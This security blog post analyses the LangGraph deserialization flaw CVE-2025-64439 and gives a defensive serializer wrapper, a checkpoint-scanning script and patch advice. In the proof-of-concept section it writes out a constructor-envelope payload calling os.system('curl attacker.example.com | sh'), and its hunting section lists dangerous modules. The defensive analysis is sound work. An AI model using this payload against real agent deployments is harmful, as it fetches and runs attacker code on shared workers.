
LangGraph CVE-2025-64439: When Agent Checkpoints Become RCE

A JsonPlusSerializer fallback in langgraph-checkpoint let attacker-controlled payloads execute arbitrary Python on deserialization. We unpack the bug, the patch, and what agent operators must change.

Nayan Dey
Security Researcher

LangChain's langgraph-checkpoint package, which sits underneath an estimated 20 million monthly downloads of LangGraph agent code, shipped a serialization fallback that turned every persisted checkpoint into a potential RCE primitive. The vulnerability, disclosed on November 13, 2025 as CVE-2025-64439 (CVSS 7.4) and tracked as GHSA-wwqv-p2pp-99h5, lives in JsonPlusSerializer, the default serializer for checkpoint persistence. When msgpack serialization fails (most commonly on lone Unicode surrogates emitted by an LLM), the serializer silently falls back to a JSON mode that supports a constructor format for custom objects, and on deserialization that format will invoke arbitrary callables such as os.system. The patch ships in langgraph-checkpoint 3.0.0, which adds an allowlist for permitted constructors and deprecates the JSON fallback. For anyone running LangGraph in production, the post-mortem reads like a textbook insecure-deserialization story dressed up in agent clothes.

How does an LLM trigger the JsonPlusSerializer fallback?

The intended path is msgpack: efficient, binary, no execution semantics. The problem is that LLM output frequently contains lone surrogates — the U+D800–U+DFFF range — because models tokenize at the byte-pair level and occasionally emit half of a UTF-16 surrogate pair. msgpack refuses to serialize lone surrogates and raises. The serializer catches that exception and falls back to a JSON representation that supports a {"lc": 2, "type": "constructor", "id": ["module", "function"], "kwargs": {...}} envelope. On deserialization, the loader resolves the dotted path and calls it with the supplied kwargs. An attacker who can place text into the agent's state — through chat history, tool output, retrieved documents, anywhere — can therefore plant a payload that executes when the checkpoint is later loaded by a worker, an analyst, or a scheduled job.
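To make the two halves of this mechanism concrete, here is a minimal sketch using only the standard library. It first shows that a lone surrogate has no UTF-8 encoding (the kind of input a strict binary encoder rejects) while `json.dumps` happily escapes it. It then shows a deliberately simplified loader that resolves a constructor envelope. `toy_load` and `utf8_encodable` are hypothetical names written for illustration, not LangGraph's actual code, and the envelope calls the harmless `datetime.timedelta`.

```python
import importlib
import json

# A lone surrogate is a legal element of a Python str but has no UTF-8 form.
lone = "hello \ud83d world"


def utf8_encodable(text: str) -> bool:
    """Return True if the text can be encoded as strict UTF-8."""
    try:
        text.encode("utf-8")
        return True
    except UnicodeEncodeError:
        return False


# json.dumps escapes the surrogate instead of failing, so a JSON path "succeeds".
as_json = json.dumps(lone)


def toy_load(envelope):
    """Hypothetical, simplified loader: resolve id=[module, name] and call it.

    UNSAFE by design; an illustration of the pattern, not LangGraph's real code.
    """
    if (
        isinstance(envelope, dict)
        and envelope.get("lc") == 2
        and envelope.get("type") == "constructor"
    ):
        module_name, attr = envelope["id"]
        target = getattr(importlib.import_module(module_name), attr)
        return target(**envelope.get("kwargs", {}))
    return envelope


benign = json.loads(
    '{"lc": 2, "type": "constructor", '
    '"id": ["datetime", "timedelta"], "kwargs": {"days": 1}}'
)
result = toy_load(benign)  # calls datetime.timedelta(days=1)
```

Nothing in `toy_load` distinguishes `datetime.timedelta` from any other importable callable, which is why a loader of this shape needs an allowlist rather than a denylist.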

What does an exploit actually look like in practice?

The PurpleOps and ResolvedSecurity write-ups both publish minimal proofs of concept. The shape is: place a string containing a lone surrogate into the agent state to force the fallback, then place a second payload that uses the constructor envelope to call os.system("curl attacker.example.com | sh") or any other Python callable. Because checkpoints are typically persisted to Postgres, SQLite, or Redis and re-read by other workers, the trigger is decoupled from the write. A user who interacts with an agent today can compromise the worker that resumes the conversation tomorrow. In multi-tenant LangGraph deployments — LangGraph Cloud, internal platforms, RAG-augmented chat — that decoupling is the worst part: the blast radius is "every worker that touches the checkpoint table," not "the worker that handled the malicious turn."

Which deployments are realistically exposed?

Three patterns are at maximum risk. First, any deployment that accepts text from end users and persists checkpoints — almost every chat application on LangGraph qualifies. Second, deployments that ingest tool outputs from third-party APIs and store them in graph state, which describes most agentic workflows that call external services. Third, multi-tenant platforms where checkpoints from one tenant are resumed by workers shared across tenants — those collapse the tenant boundary into the deserialization boundary. Deployments that use a strict in-process serializer, that never persist checkpoints, or that already restrict checkpoint reads to the same process that wrote them are less exposed, but they are also less common in production.

What does the 3.0.0 patch actually change?

The fix replaces implicit constructor execution with an explicit allowlist. Only a hardcoded set of module-and-class combinations may be reconstructed through the JSON path, and the unsafe fallback is deprecated. Operators who upgrade to 3.0 should additionally configure their checkpoint sanitization layer to strip lone surrogates from incoming state before persistence so that the fallback path is never even reached. The snippet below shows a minimal defensive wrapper for any LangGraph application that cannot upgrade immediately: it strips surrogates on write and, on read, rejects any constructor envelope whose module is not on a small allowlist.

# pre-upgrade defensive checkpoint wrapper
import re
import json
from langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer

# U+D800 through U+DFFF: the UTF-16 surrogate range
SURROGATE_RE = re.compile(r"[\ud800-\udfff]")
ALLOWLIST_MODULES = {"datetime", "decimal", "uuid", "pydantic.main"}

class HardenedSerializer(JsonPlusSerializer):
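    def dumps_typed(self, obj):
        # strip lone surrogates so we never trigger the JSON fallback
        return super().dumps_typed(self._strip_surrogates(obj))

    def _strip_surrogates(self, node):
        # recurse through plain containers, since checkpoint state is usually
        # a nested dict; custom objects (e.g. pydantic models) pass through
        # unchanged and are NOT sanitized by this sketch
        if isinstance(node, str):
            return SURROGATE_RE.sub("", node)
        if isinstance(node, dict):
            return {
                self._strip_surrogates(k): self._strip_surrogates(v)
                for k, v in node.items()
            }
        if isinstance(node, list):
            return [self._strip_surrogates(v) for v in node]
        return node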

    def loads_typed(self, data):
        kind, payload = data
        if kind == "json":
            parsed = json.loads(payload)
            self._reject_constructors(parsed)
        return super().loads_typed(data)

    def _reject_constructors(self, node):
        if isinstance(node, dict):
            if node.get("lc") == 2 and node.get("type") == "constructor":
                module = (node.get("id") or [None])[0]
                if module not in ALLOWLIST_MODULES:
                    raise ValueError(f"blocked constructor: {module}")
            for v in node.values():
                self._reject_constructors(v)
        elif isinstance(node, list):
            for v in node:
                self._reject_constructors(v)

What signals should defenders be hunting in checkpoint stores?

The cheapest detection is a scan of every checkpoint blob for the string "type": "constructor" paired with a module outside the allowlist. Even before the CVE was disclosed, that pattern was rare in legitimate checkpoints, because most agent state is dicts of primitives plus pydantic models, which round-trip through msgpack. A constructor hit with a module path in os, subprocess, posix, nt, ctypes, builtins.eval, or builtins.exec is the smoking gun. For deployments that cannot grep the blob directly, record a hash and the size of each serialized payload at write time and alert on any payload that exceeds a fixed multiple of the agent's average state size, since exploit payloads tend to be longer than benign state. Finally, instrument the workers themselves: a successful exploit usually attempts an outbound DNS lookup or a curl to a callback, so egress monitoring on agent workers catches the post-exploitation step.
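The blob scan described above can be sketched as follows, assuming checkpoint blobs are available as raw bytes. The function names, the severity labels, and the two module sets are illustrative assumptions, not part of LangGraph or of any published detection rule. Blobs that are not JSON (msgpack, for instance) are skipped rather than flagged.

```python
import json

# Assumed module roots that should never appear in a constructor id.
DANGEROUS_ROOTS = {"os", "subprocess", "posix", "nt", "ctypes", "builtins"}
# Assumed allowlist; adjust to whatever your own checkpoints legitimately use.
ALLOWED_MODULES = {"datetime", "decimal", "uuid", "pydantic.main"}


def find_constructors(node, path="$"):
    """Yield (json_path, module) for every constructor envelope in parsed JSON."""
    if isinstance(node, dict):
        if node.get("type") == "constructor":
            ident = node.get("id")
            module = ident[0] if isinstance(ident, list) and ident else None
            yield path, module
        for key, value in node.items():
            yield from find_constructors(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_constructors(value, f"{path}[{index}]")


def classify(blob: bytes):
    """Return a list of (severity, json_path, module) findings for one blob."""
    try:
        parsed = json.loads(blob)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return []  # not JSON; out of scope for this scan
    findings = []
    for path, module in find_constructors(parsed):
        root = str(module).split(".")[0]
        if root in DANGEROUS_ROOTS:
            findings.append(("critical", path, module))
        elif module not in ALLOWED_MODULES:
            findings.append(("review", path, module))
    return findings
```

Running `classify` over every row of the checkpoint table and alerting on any non-empty result gives a first-pass hunt. The "review" tier exists because an unfamiliar module is not proof of compromise, only a reason to look.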

How should Q4 2025 patching be prioritized against the rest of the agent stack?

LangGraph CVE-2025-64439 sits in the same week as the Anthropic mcp-server-git CVE chain and the CrewAI sandbox-escape set, which together turn the late-2025 agent stack into a patch-or-die quarter. Prioritise in this order: any LangGraph deployment with persisted checkpoints and untrusted input (upgrade to 3.0 within 72 hours), any LangGraph deployment without persisted checkpoints (still upgrade, just at lower urgency), and any internal fork or vendored copy of langgraph-checkpoint (audit for the same fallback pattern, because the bug is in the serializer, not the framework). Across all three, run a tabletop on the question "if a checkpoint store was already poisoned three months ago, how would we know?" — because the dwell time on this class of bug is, by design, long.
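As a starting point for the first two priorities, a worker can check its own installed version at startup. The sketch below uses only the standard library. The helper names are hypothetical, and the parser deliberately ignores pre-release suffixes, so a proper version library such as `packaging` is a better fit where one is already available.

```python
from importlib import metadata


def parse_release(version: str, width: int = 3) -> tuple:
    """Parse the leading numeric release segment, e.g. '3.0' -> (3, 0, 0)."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    # pad so that '3.0' compares equal to '3.0.0'
    parts += [0] * (width - len(parts))
    return tuple(parts)


def is_patched(version: str, fixed=(3, 0, 0)) -> bool:
    """True if the release segment is at or above the fixed version."""
    return parse_release(version) >= fixed


def installed_checkpoint_version():
    """Return the installed langgraph-checkpoint version, or None if absent."""
    try:
        return metadata.version("langgraph-checkpoint")
    except metadata.PackageNotFoundError:
        return None
```

A deployment gate could call `installed_checkpoint_version()` and refuse to start when the result is not `None` and `is_patched` returns `False`. Vendored or forked copies will not show up in package metadata, which is why the third priority still requires a manual audit.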

How Safeguard Helps

Safeguard's package intelligence ingests the GHSA-wwqv-p2pp-99h5 advisory and immediately flags every LangGraph project in your SBOMs that pins a vulnerable langgraph-checkpoint version. Reachability analysis goes further — it walks the import graph to identify which projects actually instantiate JsonPlusSerializer versus those that vendor LangGraph but use a custom serializer, so triage focuses on the genuinely exposed services. Griffin AI generates a remediation plan that pins langgraph-checkpoint>=3.0.0, adds the surrogate-stripping wrapper above as a defensive backstop, and opens a Jira ticket with the worker rotation steps. Policy gates block deployments that fail the version pin until a maintainer signs off, and the checkpoint-store hunt query — "type": "constructor" outside the allowlist — is pre-built as a Safeguard saved search that can run against any object store ingested into the platform.
